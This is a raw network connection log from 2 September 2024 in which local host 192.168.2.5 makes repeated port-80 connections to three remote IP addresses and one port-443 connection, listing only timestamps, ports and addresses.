Sep 2, 2024 14:24:52.761301994 CEST	49742	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:52.764425993 CEST	49742	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:52.769242048 CEST	80	49742	74.125.133.82	192.168.2.5
Sep 2, 2024 14:24:53.449453115 CEST	80	49742	74.125.133.82	192.168.2.5
Sep 2, 2024 14:24:53.449477911 CEST	80	49742	74.125.133.82	192.168.2.5
Sep 2, 2024 14:24:53.449516058 CEST	49742	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:53.449547052 CEST	49742	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:53.455693007 CEST	49742	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:53.456621885 CEST	49742	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:53.460855007 CEST	80	49742	74.125.133.82	192.168.2.5
Sep 2, 2024 14:24:53.460927963 CEST	49742	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:54.179867029 CEST	49743	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:54.184894085 CEST	80	49743	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:54.185026884 CEST	49743	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:54.185820103 CEST	49743	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:54.190725088 CEST	80	49743	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:55.017236948 CEST	80	49743	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:55.017263889 CEST	80	49743	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:55.017275095 CEST	80	49743	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:55.017323017 CEST	49743	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:55.017363071 CEST	49743	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:55.018306971 CEST	49743	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:55.018351078 CEST	49743	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:55.782481909 CEST	49744	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:55.787657022 CEST	80	49744	66.102.1.82	192.168.2.5
Sep 2, 2024 14:24:55.787763119 CEST	49744	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:55.787950039 CEST	49744	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:55.792855978 CEST	80	49744	66.102.1.82	192.168.2.5
Sep 2, 2024 14:24:56.486880064 CEST	80	49744	66.102.1.82	192.168.2.5
Sep 2, 2024 14:24:56.486901045 CEST	80	49744	66.102.1.82	192.168.2.5
Sep 2, 2024 14:24:56.487023115 CEST	49744	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:56.487023115 CEST	49744	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:56.487478018 CEST	49744	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:56.487510920 CEST	49744	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:57.088428974 CEST	49745	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:57.097960949 CEST	80	49745	74.125.133.82	192.168.2.5
Sep 2, 2024 14:24:57.099131107 CEST	49745	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:57.099468946 CEST	49745	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:57.104562044 CEST	80	49745	74.125.133.82	192.168.2.5
Sep 2, 2024 14:24:57.805295944 CEST	80	49745	74.125.133.82	192.168.2.5
Sep 2, 2024 14:24:57.805310965 CEST	80	49745	74.125.133.82	192.168.2.5
Sep 2, 2024 14:24:57.805381060 CEST	49745	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:57.805419922 CEST	49745	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:57.816862106 CEST	49745	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:57.816862106 CEST	49745	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:24:58.365464926 CEST	49746	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:58.523169041 CEST	80	49746	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:58.523514032 CEST	49746	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:58.523514986 CEST	49746	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:58.528417110 CEST	80	49746	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:59.391241074 CEST	80	49746	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:59.391280890 CEST	80	49746	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:59.391443014 CEST	80	49746	74.125.71.82	192.168.2.5
Sep 2, 2024 14:24:59.391654968 CEST	49746	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:59.391654968 CEST	49746	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:59.391983986 CEST	49746	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:59.392016888 CEST	49746	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:24:59.909713984 CEST	49747	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:59.914602995 CEST	80	49747	66.102.1.82	192.168.2.5
Sep 2, 2024 14:24:59.914694071 CEST	49747	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:59.914896011 CEST	49747	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:24:59.919675112 CEST	80	49747	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:00.600761890 CEST	80	49747	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:00.600785971 CEST	80	49747	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:00.600847006 CEST	49747	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:00.625010014 CEST	49747	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:00.625035048 CEST	49747	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:01.192780018 CEST	49748	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:01.197783947 CEST	80	49748	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:01.197860956 CEST	49748	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:01.199155092 CEST	49748	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:01.204052925 CEST	80	49748	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:01.884839058 CEST	80	49748	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:01.884866953 CEST	80	49748	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:01.884934902 CEST	49748	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:01.884975910 CEST	49748	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:01.885935068 CEST	49748	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:01.885957956 CEST	49748	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:02.497670889 CEST	49749	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:02.503364086 CEST	80	49749	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:02.503449917 CEST	49749	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:02.509087086 CEST	49749	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:02.513931990 CEST	80	49749	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:03.189096928 CEST	80	49749	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:03.189121008 CEST	80	49749	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:03.189201117 CEST	49749	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:03.195508003 CEST	49749	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:03.195543051 CEST	49749	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:03.759145021 CEST	49750	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:03.764157057 CEST	80	49750	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:03.764247894 CEST	49750	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:03.764422894 CEST	49750	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:03.769221067 CEST	80	49750	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:04.448973894 CEST	80	49750	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:04.449003935 CEST	80	49750	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:04.449054003 CEST	49750	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:04.449081898 CEST	49750	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:04.455383062 CEST	49750	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:04.455440044 CEST	49750	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:05.041264057 CEST	49751	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:05.046247005 CEST	80	49751	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:05.046427965 CEST	49751	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:05.046881914 CEST	49751	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:05.051748991 CEST	80	49751	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:05.739490032 CEST	80	49751	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:05.739528894 CEST	80	49751	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:05.739633083 CEST	49751	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:05.739727020 CEST	49751	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:05.753499031 CEST	49751	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:05.753534079 CEST	49751	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:06.228400946 CEST	49752	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:06.233390093 CEST	80	49752	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:06.233472109 CEST	49752	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:06.234532118 CEST	49752	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:06.239346981 CEST	80	49752	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:06.918756962 CEST	80	49752	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:06.918780088 CEST	80	49752	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:06.918829918 CEST	49752	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:06.918863058 CEST	49752	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:06.925096989 CEST	49752	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:06.925127983 CEST	49752	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:07.357515097 CEST	49753	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:07.443569899 CEST	80	49753	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:07.443711996 CEST	49753	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:07.446038961 CEST	49753	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:07.450928926 CEST	80	49753	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:08.157198906 CEST	80	49753	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:08.157231092 CEST	80	49753	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:08.157299042 CEST	49753	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:08.157613993 CEST	49753	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:08.157636881 CEST	49753	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:08.558314085 CEST	49754	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:08.563311100 CEST	80	49754	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:08.563410044 CEST	49754	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:08.563836098 CEST	49754	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:08.568856955 CEST	80	49754	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:09.248454094 CEST	80	49754	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:09.248476028 CEST	80	49754	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:09.248589039 CEST	49754	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:09.248589039 CEST	49754	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:09.248852968 CEST	49754	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:09.248893023 CEST	49754	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:09.697705030 CEST	49755	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:09.703152895 CEST	80	49755	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:09.703252077 CEST	49755	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:09.703639984 CEST	49755	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:09.708503008 CEST	80	49755	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:10.407167912 CEST	80	49755	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:10.407197952 CEST	80	49755	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:10.407428980 CEST	49755	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:10.408386946 CEST	49755	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:10.408411026 CEST	49755	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:10.803235054 CEST	49756	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:10.810576916 CEST	80	49756	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:10.812511921 CEST	49756	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:10.817604065 CEST	49756	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:10.825270891 CEST	80	49756	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:12.020350933 CEST	80	49756	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:12.020375967 CEST	80	49756	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:12.020390987 CEST	80	49756	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:12.020545006 CEST	49756	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:12.020569086 CEST	80	49756	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:12.020658970 CEST	49756	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:12.020989895 CEST	49756	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:12.021056890 CEST	49756	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:12.440310001 CEST	49757	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:12.446559906 CEST	80	49757	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:12.446674109 CEST	49757	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:12.447321892 CEST	49757	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:12.452514887 CEST	80	49757	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:13.162924051 CEST	80	49757	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:13.163024902 CEST	80	49757	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:13.163063049 CEST	49757	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:13.163156986 CEST	49757	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:13.163758039 CEST	49757	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:13.163790941 CEST	49757	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:13.662638903 CEST	49758	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:13.667561054 CEST	80	49758	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:13.667637110 CEST	49758	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:13.672786951 CEST	49758	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:13.677654982 CEST	80	49758	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:14.354072094 CEST	80	49758	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:14.354095936 CEST	80	49758	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:14.354140043 CEST	49758	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:14.354173899 CEST	49758	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:14.356573105 CEST	49758	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:14.356714010 CEST	49758	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:14.833801985 CEST	49759	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:14.838907957 CEST	80	49759	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:14.839068890 CEST	49759	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:14.839349985 CEST	49759	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:14.844208956 CEST	80	49759	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:15.530133963 CEST	80	49759	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:15.530164003 CEST	80	49759	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:15.530210972 CEST	49759	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:15.530241013 CEST	49759	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:15.530760050 CEST	49759	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:15.530807018 CEST	49759	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:15.933005095 CEST	49760	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:16.155626059 CEST	80	49760	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:16.155745983 CEST	49760	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:16.157552958 CEST	49760	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:16.162425041 CEST	80	49760	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:16.845231056 CEST	80	49760	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:16.845249891 CEST	80	49760	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:16.845334053 CEST	49760	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:16.845369101 CEST	49760	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:16.845968008 CEST	49760	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:16.846015930 CEST	49760	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:16.851018906 CEST	80	49760	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:16.851126909 CEST	49760	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:17.235089064 CEST	49761	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:17.240143061 CEST	80	49761	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:17.240282059 CEST	49761	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:17.253554106 CEST	49761	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:17.258667946 CEST	80	49761	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:17.957392931 CEST	80	49761	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:17.957453012 CEST	80	49761	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:17.957488060 CEST	49761	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:17.957528114 CEST	49761	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:17.960444927 CEST	49761	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:17.960465908 CEST	49761	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:18.340902090 CEST	49762	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:18.348790884 CEST	80	49762	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:18.348901033 CEST	49762	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:18.374253988 CEST	49762	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:18.379030943 CEST	80	49762	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:19.066195011 CEST	80	49762	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:19.066226959 CEST	80	49762	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:19.066281080 CEST	49762	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:19.066330910 CEST	49762	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:19.110599041 CEST	49762	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:19.110718012 CEST	49762	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:19.496723890 CEST	49763	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:19.501837015 CEST	80	49763	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:19.501948118 CEST	49763	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:19.502393007 CEST	49763	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:19.508809090 CEST	80	49763	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:20.201138973 CEST	80	49763	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:20.201159000 CEST	80	49763	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:20.201222897 CEST	49763	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:20.201267958 CEST	49763	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:20.205257893 CEST	49763	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:20.205257893 CEST	49763	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:20.490803957 CEST	49764	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:20.499886990 CEST	80	49764	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:20.501610041 CEST	49764	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:20.528918028 CEST	49764	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:20.537250996 CEST	80	49764	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:21.942418098 CEST	80	49764	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:21.942468882 CEST	80	49764	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:21.942491055 CEST	49764	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:21.942503929 CEST	80	49764	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:21.942524910 CEST	49764	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:21.942543983 CEST	49764	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:21.943069935 CEST	80	49764	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:21.943120003 CEST	49764	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:21.943511009 CEST	80	49764	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:21.943553925 CEST	49764	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:21.947386026 CEST	80	49764	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:21.947439909 CEST	49764	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:21.950218916 CEST	49764	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:21.952406883 CEST	49764	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:21.955436945 CEST	80	49764	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:21.955528975 CEST	49764	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:21.966077089 CEST	49765	443	192.168.2.5	149.154.167.220
Sep 2, 2024 14:25:21.966106892 CEST	443	49765	149.154.167.220	192.168.2.5
Sep 2, 2024 14:25:21.966274023 CEST	49765	443	192.168.2.5	149.154.167.220
Sep 2, 2024 14:25:21.974706888 CEST	49765	443	192.168.2.5	149.154.167.220
Sep 2, 2024 14:25:21.974720001 CEST	443	49765	149.154.167.220	192.168.2.5
Sep 2, 2024 14:25:22.292414904 CEST	49766	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:22.297550917 CEST	80	49766	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:22.297643900 CEST	49766	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:22.297926903 CEST	49766	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:22.302807093 CEST	80	49766	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:22.585345984 CEST	443	49765	149.154.167.220	192.168.2.5
Sep 2, 2024 14:25:22.585427999 CEST	49765	443	192.168.2.5	149.154.167.220
Sep 2, 2024 14:25:22.587765932 CEST	49765	443	192.168.2.5	149.154.167.220
Sep 2, 2024 14:25:22.587774038 CEST	443	49765	149.154.167.220	192.168.2.5
Sep 2, 2024 14:25:22.588018894 CEST	443	49765	149.154.167.220	192.168.2.5
Sep 2, 2024 14:25:22.650192022 CEST	49765	443	192.168.2.5	149.154.167.220
Sep 2, 2024 14:25:22.692509890 CEST	443	49765	149.154.167.220	192.168.2.5
Sep 2, 2024 14:25:22.875591993 CEST	443	49765	149.154.167.220	192.168.2.5
Sep 2, 2024 14:25:22.875657082 CEST	443	49765	149.154.167.220	192.168.2.5
Sep 2, 2024 14:25:22.875786066 CEST	49765	443	192.168.2.5	149.154.167.220
Sep 2, 2024 14:25:22.893485069 CEST	49765	443	192.168.2.5	149.154.167.220
Sep 2, 2024 14:25:22.984544992 CEST	80	49766	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:22.984566927 CEST	80	49766	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:22.984626055 CEST	49766	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:22.984626055 CEST	49766	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:22.991221905 CEST	49766	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:22.991250038 CEST	49766	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:23.276042938 CEST	49767	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:23.281075001 CEST	80	49767	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:23.281155109 CEST	49767	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:23.281482935 CEST	49767	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:23.286211967 CEST	80	49767	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:23.975589037 CEST	80	49767	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:23.975610018 CEST	80	49767	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:23.975657940 CEST	49767	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:23.975689888 CEST	49767	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:24.015124083 CEST	49767	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:24.015156031 CEST	49767	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:24.668678045 CEST	60918	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:24.810087919 CEST	80	60918	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:24.810183048 CEST	60918	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:24.810656071 CEST	60918	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:24.815471888 CEST	80	60918	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:25.526103973 CEST	80	60918	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:25.526129007 CEST	80	60918	74.125.71.82	192.168.2.5
Sep 2, 2024 14:25:25.526277065 CEST	60918	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:25.526277065 CEST	60918	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:25.531635046 CEST	60918	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:25.531635046 CEST	60918	80	192.168.2.5	74.125.71.82
Sep 2, 2024 14:25:25.921508074 CEST	60919	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:25.926489115 CEST	80	60919	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:25.926615000 CEST	60919	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:25.938826084 CEST	60919	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:25.949297905 CEST	80	60919	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:26.643619061 CEST	80	60919	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:26.643640041 CEST	80	60919	66.102.1.82	192.168.2.5
Sep 2, 2024 14:25:26.643697023 CEST	60919	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:26.643723011 CEST	60919	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:26.667035103 CEST	60919	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:26.667057991 CEST	60919	80	192.168.2.5	66.102.1.82
Sep 2, 2024 14:25:27.322407961 CEST	60920	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:27.327342987 CEST	80	60920	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:27.327424049 CEST	60920	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:27.327610016 CEST	60920	80	192.168.2.5	74.125.133.82
Sep 2, 2024 14:25:27.332499027 CEST	80	60920	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:28.043004036 CEST	80	60920	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:28.043283939 CEST	80	60920	74.125.133.82	192.168.2.5
Sep 2, 2024 14:25:28.043404102 CEST	60920	80	192.168.2.5	74.125.133.82
